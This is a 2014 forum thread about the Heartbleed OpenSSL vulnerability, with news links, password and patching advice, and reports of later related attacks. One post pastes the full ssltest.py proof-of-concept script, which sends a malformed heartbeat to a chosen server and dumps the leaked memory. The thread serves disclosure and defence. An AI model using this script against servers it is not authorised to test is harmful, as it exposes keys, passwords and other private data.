Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie

Openssl bug

Options

Comments

  • Options
    #2
    Mr Reese
    Banned (with Prison Access) Posts: 30 Mr Reese


    Last Pass recommending change of passwords just incase.

    Amazon has theirs updated

    Heartbleed Alexa top 10000


    The ould web is held together with strings.


  • Options
    #3
    syklops
    Closed Accounts Posts: 18,969 ✭✭✭✭syklops


    Dermot Illogical wrote: »
    http://arstechnica.com/security/2014/04/critical-crypto-bug-in-openssl-opens-two-thirds-of-the-web-to-eavesdropping/

    It looks like a biggie.

    If you want to check if you are vulnerable you can use the following PoC:

    http://s3.jspenguin.org/ssltest.py

    Not my work, I hasten to add.


  • Options
    #4
    industrialhorse
    Registered Users Posts: 203 ✭✭industrialhorse


    This may be somewhat useful.

    http://filippo.io/Heartbleed/


  • Options
    #5
    oscarBravo
    Technology & Internet Moderators Posts: 28,792 Mod ✭✭✭✭oscarBravo


    ssltest.py is 403ing, but the author has disclaimed copyright, so here it is: 
    #!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                  
''')

hb = h2bin(''' 
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print

def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time() 
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
        

def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return None, None, None
    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
    return typ, ver, pay

def hit_hb(s):
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False

        if typ == 24:
            print 'Received heartbeat response:'
            hexdump(pay)
            if len(pay) > 3:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True

        if typ == 21:
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False

def main():
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Connecting...'
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    print 'Sending Client Hello...'
    sys.stdout.flush()
    s.send(hello)
    print 'Waiting for Server Hello...'
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ == None:
            print 'Server closed connection without sending Server Hello.'
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break

    print 'Sending heartbeat request...'
    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)

if __name__ == '__main__':
    main()


  • Options
    #6
    brevity
    Registered Users Posts: 8,495 ✭✭✭brevity


    http://heartbleed.com/

    A lot of info here that could be useful/interesting to some.


  • Advertisement
  • Options
    #7
    Ziycon
    Registered Users Posts: 1,987 ✭✭✭Ziycon


    Came across an issue or two, some servers reporting versions outside the affected versions of 1.0.1 - 1.0.1f and 1.0.2-beta but online tools are reporting that the servers are still vulnerable, for example, on 1.0.0g and this branch is said by openssl.org not to be affected but the online scanners are saying it is.

    Don't go by the version openssl is reporting to be on the safe side as bundled openssl with some OS's tend to report conflicting information, never hurts to have the latest version install either way.


  • Options
    #8
    Villain
    Registered Users Posts: 15,944 ✭✭✭✭Villain


    You need to restart services for the new library to take affect, you check what is running on old library using
    grep -l 'libssl.*deleted' /proc/*/maps | tr -cd 0-9\\n | xargs -r ps u


  • Options
    #9
    wil
    Registered Users Posts: 4,188 ✭✭✭wil


    Anyone suggest anything in the law of unintended consequences of multi millions of users changing passwords over the next few days.

    Saw one suggestion to give the internet a miss for a few days.


  • Options
    #10
    industrialhorse
    Registered Users Posts: 203 ✭✭industrialhorse


    identropy.com suggest passphrases or a password manager. I think they may be onto a winner........

    http://blog.identropy.com/IAM-blog/bid/109952/heartbleeds-silver-lining?source=Blog_Email_%5bHeartbleed%27s%20Silver%20%5d


  • Options
    #11
    oscarBravo
    Technology & Internet Moderators Posts: 28,792 Mod ✭✭✭✭oscarBravo


    heartbleed_explanation.png


  • Advertisement
  • Options
    #12
    syklops
    Closed Accounts Posts: 18,969 ✭✭✭✭syklops


    I wish there was a version of XKCD for explaining the news and various life events. And women. And taxes. And some sports. And everything really.


  • Options
    #13
    Blowfish
    Registered Users Posts: 5,112 ✭✭✭Blowfish


    I'm sure some of you have seen it, but there were two interesting posts from one of the OpenBSD devs on how it's not just a matter of programmer error, but a much larger issue in that it would have been discovered far far earlier, but for stupid design decisions.


  • Options
    #14
    Villain
    Registered Users Posts: 15,944 ✭✭✭✭Villain


    FYI
    www.cloudflarechallenge.com/heartbleed

    https://gist.github.com/indutny/a11c2568533abcf8b9a1


  • Options
    #15
    Rucking_Fetard
    Closed Accounts Posts: 1,260 ✭✭✭Rucking_Fetard


    Meet “Cupid,” the Heartbleed attack that spawns “evil” Wi-Fi networks
    It just got easier to exploit the catastrophic Heartbleed vulnerability against wireless networks and the devices that connect to them thanks to the release last week of open source code that streamlines the process of plucking passwords, e-mail addresses, and other sensitive information from vulnerable routers and connected clients.

    Dubbed Cupid, the code comes in the form of two software extensions. The first gives wireless networks the ability to deploy "evil networks" that surreptitiously send malicious packets to connected devices. Client devices relying on vulnerable versions of the OpenSSL cryptography library can then be forced to transmit contents stored in memory. The second extension runs on client devices. When connecting to certain types of wireless networks popular in corporations and other large organizations, the devices send attack packets that similarly pilfer data from vulnerable routers.

    The release of Cupid comes eight weeks after the disclosure of Heartbleed


  • Options
    #16
    Villain
    Registered Users Posts: 15,944 ✭✭✭✭Villain


    More bugs released today https://t.co/ZIIyHE8O5C


  • Options
    #17
    Rucking_Fetard
    Closed Accounts Posts: 1,260 ✭✭✭Rucking_Fetard


    Heartbleed Redux: Another Gaping Wound in Web Encryption Uncovered


  • Options
    #18
    Khannie
    Moderators, Technology & Internet Moderators Posts: 37,485 Mod ✭✭✭✭Khannie


    Jaysus. :/


Advertisement